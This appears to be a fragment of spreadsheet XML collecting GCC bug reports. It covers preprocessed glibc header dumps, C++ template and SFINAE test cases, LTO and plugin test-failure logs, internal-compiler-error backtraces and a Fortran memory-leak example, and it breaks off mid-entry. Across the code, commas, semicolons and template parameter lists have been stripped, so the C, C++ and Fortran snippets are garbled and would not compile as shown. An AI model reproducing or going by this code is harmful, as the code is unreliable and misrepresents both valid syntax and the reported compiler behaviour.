  long int __status
  int __spinlock
}
typedef struct _pthread_descr_struct *_pthread_descr
typedef struct __pthread_attr_s
{
  int __detachstate
  int __schedpolicy
  struct __sched_param __schedparam
  int __inheritsched
  int __scope
  size_t __guardsize
  int __stackaddr_set
  void *__stackaddr
  size_t __stacksize
} pthread_attr_t
__extension__ typedef long long __pthread_cond_align_t
typedef struct
{
  struct _pthread_fastlock __c_lock
  _pthread_descr __c_waiting
  char __padding[48 - sizeof (struct _pthread_fastlock)
   - sizeof (_pthread_descr) - sizeof (__pthread_cond_align_t)]
  __pthread_cond_align_t __align
} pthread_cond_t
typedef struct
{
  int __dummy
} pthread_condattr_t
typedef unsigned int pthread_key_t
typedef struct
{
  int __m_reserved
  int __m_count
  _pthread_descr __m_owner
  int __m_kind
  struct _pthread_fastlock __m_lock
} pthread_mutex_t
typedef struct
{
  int __mutexkind
} pthread_mutexattr_t
typedef int pthread_once_t
# 150 /usr/include/bits/pthreadtypes.h 3 4
typedef unsigned long int pthread_t
# 267 /usr/include/sys/types.h 2 3 4
# 415 /usr/include/stdlib.h 2 3 4
extern long int random (void) 
extern void srandom (unsigned int __seed) 
extern char *initstate (unsigned int __seed char *__statebuf
   size_t __statelen) 
extern char *setstate (char *__statebuf) 
struct random_data
  {
    int32_t *fptr
    int32_t *rptr
    int32_t *state
    int rand_type
    int rand_deg
    int rand_sep
    int32_t *end_ptr
  }
extern int random_r (struct random_data *__restrict __buf
       int32_t *__restrict __result) 
extern int srandom_r (unsigned int __seed struct random_data *__buf) 
extern int initstate_r (unsigned int __seed char *__restrict __statebuf
   size_t __statelen
   struct random_data *__restrict __buf) 
extern int setstate_r (char *__restrict __statebuf
         struct random_data *__restrict __buf) 
extern int rand (void) 
extern void srand (unsigned int __seed) 
extern int rand_r (unsigned int *__seed) 
extern double drand48 (void) 
extern double erand48 (unsigned short int __xsubi[3]) 
extern long int lrand48 (void) 
extern long int nrand48 (unsigned short int __xsubi[3]) 
extern long int mrand48 (void) 
extern long int jrand48 (unsigned short int __xsubi[3]) 
extern void srand48 (long int __seedval) 
extern unsigned short int *seed48 (unsigned short int __seed16v[3]) 
extern void lcong48 (unsigned short int __param[7]) 
struct drand48_data
  {
    unsigned short int __x[3]
    unsigned short int __old_x[3]
    unsigned short int __c
    unsigned short int __init
    unsigned long long int __a
  }
extern int drand48_r (struct drand48_data *__restrict __buffer
        double *__restrict __result) 
extern int erand48_r (unsigned short int __xsubi[3]
        struct drand48_data *__restrict __buffer
        double *__restrict __result) 
extern int lrand48_r (struct drand48_data *__restrict __buffer
        long int *__restrict __result) 
extern int nrand48_r (unsigned short int __xsubi[3]
        struct drand48_data *__restrict __buffer
        long int *__restrict __result) 
extern int mrand48_r (struct drand48_data *__restrict __buffer
        long int *__restrict __result) 
extern int jrand48_r (unsigned short int __xsubi[3]
        struct drand48_data *__restrict __buffer
        long int *__restrict __result) 
extern int srand48_r (long int __seedval struct drand48_data *__buffer)
extern int seed48_r (unsigned short int __seed16v[3]
       struct drand48_data *__buffer) 
extern int lcong48_r (unsigned short int __param[7]
        struct drand48_data *__buffer) 
extern void *malloc (size_t __size) __attribute__ ((__malloc__))
extern void *calloc (size_t __nmemb size_t __size)
     __attribute__ ((__malloc__))
extern void *realloc (void *__ptr size_t __size) __attribute__ ((__malloc__))
extern void free (void *__ptr) 
extern void cfree (void *__ptr) 
# 1 /usr/include/alloca.h 1 3 4
# 25 /usr/include/alloca.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 26 /usr/include/alloca.h 2 3 4
extern void *alloca (size_t __size) 
# 577 /usr/include/stdlib.h 2 3 4
extern void *valloc (size_t __size) __attribute__ ((__malloc__))
# 590 /usr/include/stdlib.h 3 4
extern void abort (void) __attribute__ ((__noreturn__))
extern int atexit (void (*__func) (void)) 
extern int on_exit (void (*__func) (int __status void *__arg) void *__arg)
extern void exit (int __status) __attribute__ ((__noreturn__))
# 622 /usr/include/stdlib.h 3 4
extern char *getenv (__const char *__name) 
extern char *__secure_getenv (__const char *__name) 
extern int putenv (char *__string) 
extern int setenv (__const char *__name __const char *__value int __replace)
extern int unsetenv (__const char *__name) 
extern int clearenv (void) 
# 661 /usr/include/stdlib.h 3 4
extern char *mktemp (char *__template) 
extern int mkstemp (char *__template) 
# 688 /usr/include/stdlib.h 3 4
extern char *mkdtemp (char *__template) 
extern int system (__const char *__command) 
# 712 /usr/include/stdlib.h 3 4
extern char *realpath (__const char *__restrict __name
         char *__restrict __resolved) 
typedef int (*__compar_fn_t) (__const void * __const void *)
extern void *bsearch (__const void *__key __const void *__base
        size_t __nmemb size_t __size __compar_fn_t __compar)
extern void qsort (void *__base size_t __nmemb size_t __size
     __compar_fn_t __compar)
extern int abs (int __x) __attribute__ ((__const__))
extern long int labs (long int __x) __attribute__ ((__const__))
extern div_t div (int __numer int __denom)
     __attribute__ ((__const__))
extern ldiv_t ldiv (long int __numer long int __denom)
     __attribute__ ((__const__))
# 776 /usr/include/stdlib.h 3 4
extern char *ecvt (double __value int __ndigit int *__restrict __decpt
     int *__restrict __sign) 
extern char *fcvt (double __value int __ndigit int *__restrict __decpt
     int *__restrict __sign) 
extern char *gcvt (double __value int __ndigit char *__buf) 
extern char *qecvt (long double __value int __ndigit
      int *__restrict __decpt int *__restrict __sign) 
extern char *qfcvt (long double __value int __ndigit
      int *__restrict __decpt int *__restrict __sign) 
extern char *qgcvt (long double __value int __ndigit char *__buf) 
extern int ecvt_r (double __value int __ndigit int *__restrict __decpt
     int *__restrict __sign char *__restrict __buf
     size_t __len) 
extern int fcvt_r (double __value int __ndigit int *__restrict __decpt
     int *__restrict __sign char *__restrict __buf
     size_t __len) 
extern int qecvt_r (long double __value int __ndigit
      int *__restrict __decpt int *__restrict __sign
      char *__restrict __buf size_t __len) 
extern int qfcvt_r (long double __value int __ndigit
      int *__restrict __decpt int *__restrict __sign
      char *__restrict __buf size_t __len) 
extern int mblen (__const char *__s size_t __n) 
extern int mbtowc (wchar_t *__restrict __pwc
     __const char *__restrict __s size_t __n) 
extern int wctomb (char *__s wchar_t __wchar) 
extern size_t mbstowcs (wchar_t *__restrict __pwcs
   __const char *__restrict __s size_t __n) 
extern size_t wcstombs (char *__restrict __s
   __const wchar_t *__restrict __pwcs size_t __n)
extern int rpmatch (__const char *__response) 
# 908 /usr/include/stdlib.h 3 4
extern int getloadavg (double __loadavg[] int __nelem) 
# 47 matrix.c 2
# 1 /usr/include/string.h 1 3 4
# 28 /usr/include/string.h 3 4
# 1 /usr/lib/gcc/i486-slackware-linux/3.4.0/include/stddef.h 1 3 4
# 34 /usr/include/string.h 2 3 4
extern void *memcpy (void *__restrict __dest
       __const void *__restrict __src size_t __n) 
extern void *memmove (void *__dest __const void *__src size_t __n)
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
        int __c size_t __n)
extern void *memset (void *__s int __c size_t __n) 
extern int memcmp (__const void *__s1 __const void *__s2 size_t __n)
     __attribute__ ((__pure__))
</t>
  </si>
  <si>
    <t>rsmith</t>
  </si>
  <si>
    <t>GCC-38791</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/graphite/block-3.c (test for excess errors)</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 the test gcc/testsuite/gcc.dg/graphite/block-3.c introduced in revision 143159 fails with:
[ibook-dhum] f90/bug% gcc44 /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/graphite/block-3.c
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/graphite/block-3.c:6: error: size of array 'A' is too large</t>
  </si>
  <si>
    <t>GCC-4601</t>
  </si>
  <si>
    <t>printf() arg checking doesn't work with merged strings</t>
  </si>
  <si>
    <t>compile with -Wformat :
printf( %02bx 123)
printf( %02 b x 123 )
line #1 above is a compile error.
line #2 above is not a compile error.
they are semantically exactly the same.
Release:
unknown
Environment:
gcc version 2.95.2 19991024 (release)
FreeBSD 4.2</t>
  </si>
  <si>
    <t>dgillies</t>
  </si>
  <si>
    <t>GCC-14337</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] SFINAE doesn't work</t>
  </si>
  <si>
    <t>The overload rules for template functions don't seem to be obeyed when the 
caller is himself a template. I noticed this because I use the trick mentioned 
here: http://m17n.org/martin/writings/template-parameter-constraints.html :a 
_lot_ in my code ). An example that fails to compile follows. Notice that if 
you change the template on the foo(Hello) function to be a static type 
(such as by moving the comment from the typedef line to the template line) then 
the code compiles fine. I last tried this with the 3.4 branch of cvs from last 
night.
template 
struct Constraint
template 
struct Constraint {
    typedef Type_ Result
}
template 
struct IsGood {
    static const bool value = false
}
template 
struct IsGood {
    static const bool value = true
}
template 
typename Constraint::value void&gt;::Result foo(Type_ &amp;value) {
}
template 
typename Constraint::value void&gt;::Result foo(Type_ &amp;value) {
}
template 
class Hello {
}
// switch this template to the typedef and the code will work
//typedef int Member_
template 
void foo(Hello &amp;value) {
    unsigned size
    foo(size)
}
int main() {
    return 0
}</t>
  </si>
  <si>
    <t>saurik</t>
  </si>
  <si>
    <t>GCC-56912</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] scheduler change breaks linux kernel LTO build with 4.8</t>
  </si>
  <si>
    <t>For the Linux kernel LTO build I get ICEs during LTO (segfaults) with the recent 4.8 branch. I bisected it down to this patch and reverting fixes it.
No simple test case unfortunately as it is LTO 
            Backport from mainline
            2013-02-25  Andrey Belevantsev  
            Alexander Monakov  
            PR middle-end/56077
            * sched-deps.c (sched_analyze_insn): When reg_pending_barrier
            flush pending lists also on non-jumps.  Adjust comment.
Typical crash:
#7  
#8  sched_analyze_1 (deps=0x7fff550a5c00 x=0x7fa0311e2ed0 insn=0x7fa0311f40d8)
    at ../../gcc/gcc/sched-deps.c:2479
#9  0x0000000000b668d5 in sched_analyze_insn (deps=deps@entry=0x7fff550a5c00 
    x=0x7fa0311e2e70 insn=insn@entry=0x7fa0311f40d8) at ../../gcc/gcc/sched-deps.c:2859
#10 0x0000000000b6859b in deps_analyze_insn (deps=deps@entry=0x7fff550a5c00 
    insn=insn@entry=0x7fa0311f40d8) at ../../gcc/gcc/sched-deps.c:3505
#11 0x0000000000b689c3 in sched_analyze (deps=0x7fff550a5c00 head= 
    tail=0x7fa0311f8c18) at ../../gcc/gcc/sched-deps.c:3653
#12 0x000000000070b635 in compute_block_dependences (bb=0) at ../../gcc/gcc/sched-rgn.c:2702
#13 sched_rgn_compute_dependencies (rgn=rgn@entry=5) at ../../gcc/gcc/sched-rgn.c:3140
#14 0x000000000070df84 in schedule_region (rgn=5) at ../../gcc/gcc/sched-rgn.c:2915
#15 schedule_insns () at ../../gcc/gcc/sched-rgn.c:3299
#16 schedule_insns () at ../../gcc/gcc/sched-rgn.c:3278
#17 0x000000000070e3b1 in rest_of_handle_sched2 () at ../../gcc/gcc/sched-rgn.c:3523
#18 0x00000000006b534e in execute_one_pass (pass=pass@entry=0x112e240 )
    at ../../gcc/gcc/passes.c:2084
#19 0x00000000006b56bd in execute_pass_list (pass=0x112e240 )
    at ../../gcc/gcc/passes.c:2139
#20 0x00000000006b56cf in execute_pass_list (pass=0x112d840 )
    at ../../gcc/gcc/passes.c:2140
#21 0x00000000006b56cf in execute_pass_list (pass=0x112d8a0 )
    at ../../gcc/gcc/passes.c:2140
#22 0x0000000000792043 in tree_rest_of_compilation (fndecl=0x7fa03f899700)
    at ../../gcc/gcc/tree-optimize.c:422
#23 0x0000000000536f7b in cgraph_expand_function (node=0x7fa03c49b5a0)</t>
  </si>
  <si>
    <t>GCC-46319</t>
  </si>
  <si>
    <t>LTO plugin test failures with --with-build-config=bootstrap-lto --with-plugin-ld=ld</t>
  </si>
  <si>
    <t>On Linux/x86-64 with binutils from CVS on 2010-11-05
revision 166360 gave extra failures:
FAIL: gcc.dg/plugin/finish_unit-test-1.c -fplugin=./finish_unit_plugin.so (test for excess errors)
FAIL: gcc.dg/plugin/finish_unit-test-1.c -fplugin=./finish_unit_plugin.so (test for excess errors)
FAIL: gcc.dg/plugin/ggcplug-test-1.c -fplugin=./ggcplug.so (test for excess errors)
FAIL: gcc.dg/plugin/ggcplug-test-1.c -fplugin=./ggcplug.so (test for excess errors)
FAIL: gcc.dg/plugin/one_time-test-1.c -fplugin=./one_time_plugin.so (test for excess errors)
FAIL: gcc.dg/plugin/one_time-test-1.c -fplugin=./one_time_plugin.so (test for excess errors)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so (test for excess errors)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so (test for excess errors)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 15)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 15)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 19)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 19)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 20)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 20)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 21)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 21)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 22)
FAIL: gcc.dg/plugin/self-assign-test-1.c -fplugin=./selfassign.so  (test for warnings line 22)
FAIL: gcc.dg/plugin/self-assign-test-2.c -fplugin=./selfassign.so (test for excess errors)
FAIL: gcc.dg/plugin/self-assign-test-2.c -fplugin=./selfassign.so (test for excess errors)
FAIL: gcc.dg/plugin/start_unit-test-1.c -fplugin=./start_unit_plugin.so (test for excess errors)
FAIL: gcc.dg/plugin/start_unit-test-1.c -fplugin=./start_unit_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line )
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line )
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 16)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 16)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 7)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 7)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 7)
FAIL: g++.dg/plugin/attribute_plugin-test-1.C -fplugin=./attribute_plugin.so  (test for warnings line 7)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 10)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 10)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 14)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 14)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 18)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 18)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 19)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 19)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 24)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 24)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/dumb-plugin-test-1.C -fplugin=./dumb_plugin.so  (test for warnings line 50)
FAIL: g++.dg/plugin/header-plugin-test.C -fplugin=./header_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/header-plugin-test.C -fplugin=./header_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so (test for excess errors)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line )
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line )
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 14)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 14)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 5)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 5)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 9)
FAIL: g++.dg/plugin/pragma_plugin-test-1.C -fplugin=./pragma_plugin.so  (test for warnings line 9)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so (test for excess errors)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so (test for excess errors)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 10)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 10)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 13)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 13)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 26)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 26)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 27)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 27)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 33)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 33)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 34)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 34)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 40)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 40)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 41)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 41)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 42)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 42)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 43)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 43)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 44)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 44)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 46)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 46)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 47)
FAIL: g++.dg/plugin/self-assign-test-1.C -fplugin=./selfassign.so  (test for warnings line 47)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so (test for excess errors)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so (test for excess errors)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 10)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 10)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 13)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 13)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 26)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 26)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 27)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 27)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 33)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 33)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 34)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 34)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 40)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 40)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 41)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 41)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 42)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 42)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 46)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 46)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 47)
FAIL: g++.dg/plugin/self-assign-test-2.C -fplugin=./selfassign.so  (test for warnings line 47)
FAIL: g++.dg/plugin/self-assign-test-3.C -fplugin=./selfassign.so (test for excess errors)
FAIL: g++.dg/plugin/self-assign-test-3.C -fplugin=./selfassign.so (test for excess errors)
Executing on host: /export/build/gnu/gcc-lto/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-lto/build-x86_64-linux/gcc/ /export/gnu/import/git/gcc/gcc/testsuite/gcc.dg/plugin/finish_unit-test-1.c  -fplugin=./finish_unit_plugin.so -O -S  -m32 -o finish_unit-test-1.s    (timeout = 300)
cc1: error: Fail to initialize plugin ./finish_unit_plugin.so^M
compiler exited with status 1
GCC is configured with
--enable-clocale=gnu --with-system-zlib --with-demangler-in-ld  --enab
le-shared --enable-threads=posix --enable-haifa  --prefix=/usr/gcc-4.6.0 --with-
local-prefix=/usr/local --with-fpmath=sse --with-build-config=bootstrap-lto --wi
th-plugin-ld=ld</t>
  </si>
  <si>
    <t>GCC-23914</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] further 'non-constant' template argument case exposed by Boost</t>
  </si>
  <si>
    <t>Failing case comes from regression testing using Boost uBLAS with gcc4.0.2 
prerelease: 
Using built-in specs. 
Target: x86_64-unknown-linux-gnu 
Configured with: ../gcc-4.0.2-20050913/configure 
--prefix=/home/michael/locacc402 
Thread model: posix 
gcc version 4.0.2 20050913 (prerelease) 
The failure in this case is caused by 
    BOOST_STATIC_ASSERT (foo_template::complexity == 0) 
where foo_template is defined thus: 
  template  
  struct foo_template { 
      public: 
          static const unsigned complexity = 0 
  } 
N.B. failure only occurs if foo_template is a template class. 
Suggestive is that if 'foo_template::complexity' encountered anyware by the 
compiler prior to the failing instantiation then problem disappers. Therefore 
    const unsigned a = foo_template::complexity 
    BOOST_STATIC_ASSERT (foo_template::complexity == 0) 
is instantiated without error! 
Minimal test case without Boost headers is: 
template  
struct foo_template { 
  static const unsigned complexity = 0 
} 
template  struct STATIC_ASSERTION {} 
void gcc_402_problem_minimal() 
{ 
  sizeof(STATIC_ASSERTION::complexity &gt;) 
} 
cc402.cpp: In function void gcc_402_problem_minimal(): 
gcc402.cpp:10: error: foo_template::complexity is not a valid template 
argument for type int because it is a non-constant expression</t>
  </si>
  <si>
    <t>GCC-80983</t>
  </si>
  <si>
    <t>[F03] memory leak when calling procedure-pointer component with allocatable result</t>
  </si>
  <si>
    <t>Follow-up to PR 70601 ...
The following program is compiled fine by gfortran but exhibits a memory leak on the PPC call at runtime:
program test
  implicit none
  type :: concrete_type
    procedure (alloc_integer) pointer nopass :: alloc
  end type
  procedure (alloc_integer) pointer :: pp
  type(concrete_type) :: concrete
  print * alloc_integer()     ! allocated memory is freed
  pp =&gt; alloc_integer
  print * pp()                ! freed as well
  concrete % alloc =&gt; alloc_integer
  print * concrete % alloc()  ! memory leak !!!
contains
   function alloc_integer() result(res)
      integer allocatable :: res
      allocate(res source=13)
   end function
end
Effectively this program calls the same function three times. But while freeing the memory works fine for the direct call and the procedure-pointer call the PPC call misses the memory cleanup.</t>
  </si>
  <si>
    <t>GCC-31722</t>
  </si>
  <si>
    <t>[4.3 regression] gomp is broken</t>
  </si>
  <si>
    <t>There are many gomp failures in
http://gcc.gnu.org/ml/gcc-testresults/2007-04/msg01353.html
On both Linux/ia64 and Linux/x86-64 I saw many failures like
Executing on host: /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../g++ -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/g++.dg/gomp/block-0.C  -nostdinc++ -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/include -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/libsupc++ -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/include/backward -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0  -fopenmp -fdump-tree-omplower  -S  -m32 -o block-0.s    (timeout = 300)
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/g++.dg/gomp/block-0.C: In function 'void _Z3foov.omp_fn.0(void*)':^M
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/g++.dg/gomp/block-0.C:28: internal compiler error: in calc_dfs_tree at dominance.c:374^M
Please submit a full bug report^M
with preprocessed source if appropriate.^M
See  for instructions.^M
compiler exited with status 1</t>
  </si>
  <si>
    <t>GCC-69174</t>
  </si>
  <si>
    <t>[6 Regression] ICE (segfault) in operand_equal_p</t>
  </si>
  <si>
    <t>trunk r232077 aarch64-linux-gnu works with -O2
reduced test case:
typedef int pixval
typedef struct { pixval r g b } xel
int convertRow_sample convertRaster_col
short *convertRow_samplebuf
xel *convertRow_xelrow
short convertRow_spp
void fn1() {
  int *alpharow
  for ( convertRaster_col
       ++convertRaster_col convertRow_sample += convertRow_spp) {
    convertRow_xelrow[convertRaster_col].r =
        convertRow_xelrow[convertRaster_col].g =
            convertRow_xelrow[convertRaster_col].b =
                convertRow_samplebuf[convertRow_sample]
    alpharow[convertRaster_col] = convertRow_samplebuf[convertRow_sample + 3]
  }
}
$ gcc -c -g -O3 tifftopnm.i
tifftopnm.i: In function 'fn1':
tifftopnm.i:7:6: internal compiler error: Segmentation fault
 void fn1() {
      ^~~
0x96082f crash_signal
        ../../src/gcc/toplev.c:334
0x73e424 operand_equal_p(tree_node const* tree_node const* unsigned int)
        ../../src/gcc/fold-const.c:2742
0xae8a13 lower_vec_perm
        ../../src/gcc/tree-vect-generic.c:1247
0xae9463 expand_vector_operations_1
        ../../src/gcc/tree-vect-generic.c:1518
0xae9463 expand_vector_operations
        ../../src/gcc/tree-vect-generic.c:1767
0xae9463 execute
        ../../src/gcc/tree-vect-generic.c:1851
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-23565</t>
  </si>
  <si>
    <t>[4.1 Regression] ACATS FAIL c32001e inccorect array bounds</t>
  </si>
  <si>
    <t>Started failing on x86_64-linux between
LAST_UPDATED: Mon Aug 22 11:06:07 UTC 2005
